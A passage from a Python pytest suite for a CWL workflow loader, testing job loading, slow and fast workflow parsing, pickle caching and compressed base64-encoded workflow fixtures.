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 zhXTfFcVnL/gosFZpps\
/GU8SmShNS4FB6wsEIYqpbGyfu61v/weDmYiG",
None
)
]
)
def test_load_job_from_object_with_default_inputs_folder(job, workflow, cwd):
    """Relative job input locations should resolve via cwl_args["inputs_folder"].

    Copies the shared test inputs into a fresh temporary folder so the job's
    relative "location" entries can be found there. Both temporary folders
    are removed even when loading fails.
    """
    pickle_folder = tempfile.mkdtemp()
    inputs_folder = tempfile.mkdtemp()
    if isinstance(workflow, str):
        workflow_path = workflow
    else:
        workflow_path = os.path.join(DATA_FOLDER, *workflow)
    # copy input files so they are discoverable under inputs_folder
    shutil.copytree(
        os.path.join(DATA_FOLDER, "inputs"),
        os.path.join(inputs_folder, "inputs")
    )
    try:
        load_job(  # result intentionally unused; only success/failure matters
            workflow=workflow_path,
            job=job,
            cwl_args={
                "pickle_folder": pickle_folder,
                "inputs_folder": inputs_folder
            },
            cwd=cwd
        )
    except BaseException as err:
        # Surface the underlying error (it was previously discarded and the
        # message was an f-string without any placeholder).
        assert False, f"Failed to load job from parsed object. \n {err}"
    finally:
        shutil.rmtree(pickle_folder)
        shutil.rmtree(inputs_folder)
# Links are no longer checked when loading a job, so this test is no longer relevant
# @pytest.mark.parametrize(
# "job, workflow, cwd",
# [
# (
# {
# "bam_file": {
# "class": "File",
# "location": "../inputs/chr4_100_mapped_reads.bam"
# },
# "chrom_length_file": {
# "class": "File",
# "location": "../inputs/chr_name_length.txt"
# },
# "scale": 1
# },
# ["workflows", "bam-bedgraph-bigwig.cwl"],
# None
# ),
# (
# {
# "bam_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "chrom_length_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "scale": 1
# },
# ["workflows", "bam-bedgraph-bigwig.cwl"],
# None
# ),
# (
# {
# "bam_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "chrom_length_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "scale": 1
# },
# ["workflows", "bam-bedgraph-bigwig.cwl"],
# os.path.join(DATA_FOLDER, "jobs")
# ),
# (
# {
# "bam_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "chrom_length_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "scale": 1
# },
# # bam-bedgraph-bigwig.cwl
# "eNqtV21z1DYQ/iuaGzqBac5OwsvAFWhDgJKWtyFQPpBOTrb3bE1kyZXkOwLDf++uZPtsxy\
# HttGGY8UmrfVbPvmj36yzdyD/AWKHVbMFm6/1ob7bLZqnk1tLCR23OV1JvaNHAX7UwUIJy\
# tPfp61bsxEF1rKraPftcGbCk7t1WevZtl/WEj5UUCn7ja25TIyo3kPwTgQRpItGvs4SXZy\
# shwf9wFxV9zJ7TAsplOg36UJw9OXzFSHKXWW0cZCy5YKnWJhOKO7BkwywtjC7PJKjcFdeq\
# fc8TloEUpSBt/qi2ugQWznuwBXvoN17zEh4/fH/45HH4fSK+wGMPaVM+gkE6ufu5B3SkYb\
# USqcD7M6eZP8FcASwHRXipXoPhOdCNOP5S1nEUXfHUaeNBSl5VkJ0Z4Jk9U3WZgBlACjUA\
# fMsN2uvAEByipbVEihpgbtn+nv+LJ9RG7DhX2gR6E8ic1tLOg6FoZ4ThxIQ6VeQ3p89QIj\
# e8KpjFAGFi1WAIyyqj1yKD7FT5G1RcmLQQ1cDsBJUDV33TnymeoAISh2wOKrtEUnsfimjS\
# vMJVCq0ziz75HisngJyKz3i19gijI2ylzbUg1hmusoF2XBIqH/i5Y3qsTq+QNPTHmkuL6L\
# pEP9sKUoFhwRrdBJOIfCNyH7kKPXgN3pvaUWK00u1FENKnh8g/ijyobbz0PymG7FfSFoip\
# pHDXOfVqYkgz8LRAhxtHNFFaeJ1Nhu+83mHIDtt5usMoTj1ohvZdi1lwhQCBXMaD5pJsID\
# VURFiiMct98KNBdE1yjDeALt26hQC1J6SpWFsfTVaXIHuia5MGen216jLFZ41XEfc1XSI/\
# uM/74LIP/zFwBxs3ZrRgkicgPXWNN5neOn3CmlYq2BNSAqptDe/VAr9mav/eRFHsK0g8XU\
# pm/jHwB/yb0F5u+yyQJVC5oDSDFa8lhdtsnuSj+LPbi/s13MR0q+E5epVWb3w9VYxK1E0L\
# csUePWKqlvKWX2UYBq42ijlTw0+08o2BtMCGu3Qw7J6qb01hC7T1M2si3YYFcPs9Ub5GC7\
# 0Xpvm48jmYXO7XrvbLZxD99nnUXIIe/FlwzlmbnsEFf3qe+8E06WF88+vPc5IbebZW/dhr\
# nNuLl3gSFc+fw8XI7Z9m+7v7tHWwe6DQsL7tfZDO5MnEmzS/Tm06b2WdDpKjm4xz8PspNt\
# WMTCxeEUOjl6B/037dCBzcIBlb8RRCRvo2rHCuWsSxTQsoeaRNHnstN8KC7/C8jB0KrUO3\
# GFO9tq7dMdlqRq2bXXQW8rLja94Q6wUyvVHYAmUfjGzNIAjDN1EuXFEntQWDXY7DII+w8M\
# ZPuLHnYo4lKd407ajF3gQLjGmrx2Ws1jV2keoM3kGlrcB26aIPGeCuxAjHpUhBWegxttls\
# Io5kFuAJaQRs/PL46Nnrk2fzg9BD24Ww2Gm5NyvPedf+2sURpqATa6DmejYg7UiXpVas7b\
# rZS3ykaoz5IFVvGUMzUi+7kVvX4V1Jszaj7twu3picK/ElNCzhWpBz+bqFFSoVCvtkwY4K\
# ITMDaseyF9pWwnHJXkEmsLawI6AmpTmv06BtDPVWY3sqD7OM5oAgy8OPI10rFzzw4eRwsP\
# UStWFRvhgaMxB5B3kzpLx5ETYqj3SE7qXVO3cPDh6EDaxjAK41Afdu4x97giUaW7zDdcOm\
# AwlVoZU//eP+zbv7t2/du31vfudgby/MIXTLXPcjhlyfdvalDVfWu2Ael8gTj7f7PxzsdS\
# JxLnXCJS7ZgmPvGnc7cwKZK9hElWpTBKjf8QPRv/TkoZRg8gvfEx2XZa00ar/4r1pDdrB3\
# YIHjy4RhmQSpEprHZRQDWCNaRW1ov0K6OEj2u3ZS8CaKsHQIGd4mIZ1elALZic6DyC85rV\
# J6Nm5FTYfN5CmyXiZok4rM+4DGljn+P5jfu3P/3vz2/Qf30ZXtv23b0iUY1hksaM4yMRgi\
# qR3XbY9FXA4aHBud4ogzHDuZLXQtSXB6/mQ3m/HZbyxHb9zSD0i3gt4VW/oWZdkYhdOS0q\
# 6bmBjWR9+IkKLm7YvY0/DB0N04M+ARUVbSz9R4Qii27JqdJdoLaKnucE5VA6QsAlxhHM2K\
# fK1FxjDvrKApLKlzUo2Vlsow22A5xR7IORwXWsOYh7W+kW8La7hWIHHpm5YlK3DsLERe4E\
# xaGaEN1gJG773vt5cTncsyYu9xC2MO5wLlR0rkJRtOtMt5o77qJl40BFHbdpN17eYS+z66\
# 5aXL30L18oLuibM3R+o3BajGM631Iw9FDNOw8wSyO3BFw/Fkw7sMpIxe9yWxKRTSSGw0jb\
# ifvLxpU3Odj8nIwwx7zSt1narpMS5EN+VAyuneK/SnSgl6GtTbRVHRcXX5OmO+6NJE2ShC\
# PGozW7FMqx2HcbJG8tBSHNXaQO4CMyzjYSwZFdayRNCbwsAYbWywZYsQ4uVUYeDZOmnXo9\
# m3vwGItZCP",
# os.path.join(DATA_FOLDER, "jobs")
# ),
# (
# {
# "bam_file": {
# "class": "File",
# "location": get_absolute_path(
# "../inputs/dummy.txt",
# os.path.join(DATA_FOLDER, "jobs")
# )
# },
# "chrom_length_file": {
# "class": "File",
# "location": get_absolute_path(
# "../inputs/dummy.txt",
# os.path.join(DATA_FOLDER, "jobs")
# )
# },
# "scale": 1
# },
# ["workflows", "bam-bedgraph-bigwig.cwl"],
# None
# ),
# (
# {
# "bam_file": {
# "class": "File",
# "location": get_absolute_path(
# "../inputs/dummy.txt",
# os.path.join(DATA_FOLDER, "jobs")
# )
# },
# "chrom_length_file": {
# "class": "File",
# "location": get_absolute_path(
# "../inputs/dummy.txt",
# os.path.join(DATA_FOLDER, "jobs")
# )
# },
# "scale": 1
# },
# ["workflows", "bam-bedgraph-bigwig.cwl"],
# os.path.join(DATA_FOLDER, "jobs")
# ),
# (
# {
# "bam_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "chrom_length_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "scale": 1
# },
# ["workflows", "dummy.cwl"],
# None
# )
# ]
# )
# def test_load_job_from_object_should_fail(job, workflow, cwd):
# with pytest.raises(AssertionError):
# test_load_job_from_object(job, workflow, cwd)
def test_slow_cwl_load_workflow():
    """A full (non-cached) load of a workflow file yields a Workflow object."""
    workflow_location = os.path.join(
        DATA_FOLDER, "workflows", "bam-bedgraph-bigwig.cwl"
    )
    workflow_data = slow_cwl_load(workflow=workflow_location)
    assert isinstance(workflow_data, Workflow)
def test_slow_cwl_load_command_line_tool():
    """A full load of a tool file yields a CommandLineTool object."""
    tool_location = os.path.join(DATA_FOLDER, "tools", "linux-sort.cwl")
    command_line_tool_data = slow_cwl_load(workflow=tool_location)
    assert isinstance(command_line_tool_data, CommandLineTool)
def test_slow_cwl_load_reduced_workflow():
    """With only_tool=True the loader returns the workflow as a CommentedMap."""
    workflow_location = os.path.join(
        DATA_FOLDER, "workflows", "bam-bedgraph-bigwig.cwl"
    )
    reduced_tool = slow_cwl_load(workflow=workflow_location, only_tool=True)
    assert isinstance(reduced_tool, CommentedMap)
def test_slow_cwl_load_reduced_command_line_tool():
    """With only_tool=True the loader returns the tool as a CommentedMap."""
    tool_location = os.path.join(DATA_FOLDER, "tools", "linux-sort.cwl")
    reduced_tool = slow_cwl_load(workflow=tool_location, only_tool=True)
    assert isinstance(reduced_tool, CommentedMap)
def test_slow_cwl_load_parsed_workflow():
    """Feeding an already-parsed tool back into slow_cwl_load should still work."""
    workflow_location = os.path.join(
        DATA_FOLDER, "workflows", "bam-bedgraph-bigwig.cwl"
    )
    parsed_tool = slow_cwl_load(workflow=workflow_location, only_tool=True)
    reparsed_tool = slow_cwl_load(parsed_tool)
    assert isinstance(reparsed_tool, CommentedMap)
def test_slow_cwl_load_compressed_workflow():
    """A compressed representation of a parsed tool can be loaded back."""
    workflow_location = os.path.join(
        DATA_FOLDER, "workflows", "bam-bedgraph-bigwig.cwl"
    )
    parsed_tool = slow_cwl_load(workflow=workflow_location, only_tool=True)
    decoded_tool = slow_cwl_load(
        get_compressed(parsed_tool),
        only_tool=True
    )
    assert isinstance(decoded_tool, CommentedMap)
def test_slow_cwl_load_compressed_raw_workflow():
    """A compressed raw (single-container) workflow location loads to a CommentedMap."""
    raw_location = os.path.join(
        DATA_FOLDER, "workflows", "bam-bedgraph-bigwig-single.cwl"
    )
    workflow_tool = slow_cwl_load(
        get_compressed(raw_location),
        only_tool=True
    )
    assert isinstance(workflow_tool, CommentedMap)
def test_slow_cwl_load_workflow_should_fail():
    """Loading the dummy workflow must raise SchemaSaladException.

    NOTE(review): presumably dummy.cwl is missing or malformed — confirm
    against the test data folder.
    """
    with pytest.raises(SchemaSaladException):
        # Return value intentionally discarded (was bound to an unused
        # variable before); only the raised exception matters.
        slow_cwl_load(
            workflow=os.path.join(
                DATA_FOLDER, "workflows", "dummy.cwl"
            )
        )
def test_slow_cwl_load_compressed_raw_workflow_should_fail():
    """Compressing a multi-file workflow location and loading it must fail.

    Unlike the "-single" variant used in the passing test above, this
    workflow is expected to raise SchemaSaladException when loaded from its
    compressed form.
    """
    with pytest.raises(SchemaSaladException):
        # Return value intentionally discarded (was bound to an unused
        # variable before); only the raised exception matters.
        slow_cwl_load(
            get_compressed(
                os.path.join(
                    DATA_FOLDER, "workflows", "bam-bedgraph-bigwig.cwl"
                )
            ),
            only_tool=True
        )
@pytest.mark.parametrize(
"workflow",
[
(
["workflows", "bam-bedgraph-bigwig.cwl"]
),
(
["tools", "linux-sort.cwl"]
)
]
)
def test_fast_cwl_load_workflow_from_cwl(workflow):
    """fast_cwl_load should parse the CWL file and drop a pickled copy into pickle_folder."""
    pickle_folder = tempfile.mkdtemp()
    cwl_path = os.path.join(DATA_FOLDER, *workflow)
    expected_pickle = get_md5_sum(cwl_path) + ".p"
    try:
        parsed_tool = fast_cwl_load(
            workflow=cwl_path,
            cwl_args={"pickle_folder": pickle_folder}
        )
        cached_files = os.listdir(pickle_folder)
    except BaseException as err:
        assert False, f"Failed to run test. \n {err}"
    finally:
        shutil.rmtree(pickle_folder)
    assert isinstance(parsed_tool, CommentedMap), \
        "Failed to parse CWL file"
    assert expected_pickle in cached_files, \
        "Failed to pickle CWL file"
@pytest.mark.parametrize(
"workflow",
[
(
["workflows", "bam-bedgraph-bigwig.cwl"]
),
(
["tools", "linux-sort.cwl"]
)
]
)
def test_fast_cwl_load_workflow_from_parsed(workflow):
    """Passing an already-parsed tool back into fast_cwl_load should work.

    The first call parses the CWL file; the second call receives the parsed
    tool itself and must still return a CommentedMap. The unused
    ``pickled_workflow_path`` computation from the original was removed
    (F841) — this test never inspects the pickle folder contents.
    """
    pickle_folder = tempfile.mkdtemp()
    workflow_path = os.path.join(DATA_FOLDER, *workflow)
    try:
        workflow_tool = fast_cwl_load(
            workflow=workflow_path,
            cwl_args={"pickle_folder": pickle_folder}
        )
        workflow_tool = fast_cwl_load(
            workflow=workflow_tool,
            cwl_args={"pickle_folder": pickle_folder}
        )
    except BaseException as err:
        assert False, f"Failed to run test. \n {err}"
    finally:
        shutil.rmtree(pickle_folder)
    assert isinstance(workflow_tool, CommentedMap), \
        "Failed to parse CWL file"
@pytest.mark.parametrize(
"workflow",
[
(
["workflows", "bam-bedgraph-bigwig.cwl"]
),
(
["tools", "linux-sort.cwl"]
)
]
)
def test_fast_cwl_load_workflow_from_pickle(workflow):
    """The second load must be served from the pickled cache, not by re-parsing."""
    pickle_folder = tempfile.mkdtemp()
    cwl_path = os.path.join(DATA_FOLDER, *workflow)
    # A copy placed inside pickle_folder will fail if parsed directly, so a
    # successful second load proves the pickled cache was used.
    duplicate_cwl_path = os.path.join(pickle_folder, workflow[-1])
    shutil.copy(cwl_path, duplicate_cwl_path)
    try:
        # first call creates the pickled file
        fast_cwl_load(
            workflow=cwl_path,
            cwl_args={"pickle_folder": pickle_folder}
        )
        # second call should load from the pickled file
        workflow_tool = fast_cwl_load(
            workflow=duplicate_cwl_path,
            cwl_args={"pickle_folder": pickle_folder}
        )
    except BaseException as err:
        assert False, f"Failed to run test. \n {err}"
    finally:
        shutil.rmtree(pickle_folder)
    assert isinstance(workflow_tool, CommentedMap), \
        "Failed to load pickled CWL file"
@pytest.mark.parametrize(
"workflow",
[
( # bam-bedgraph-bigwig-single.cwl
"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\
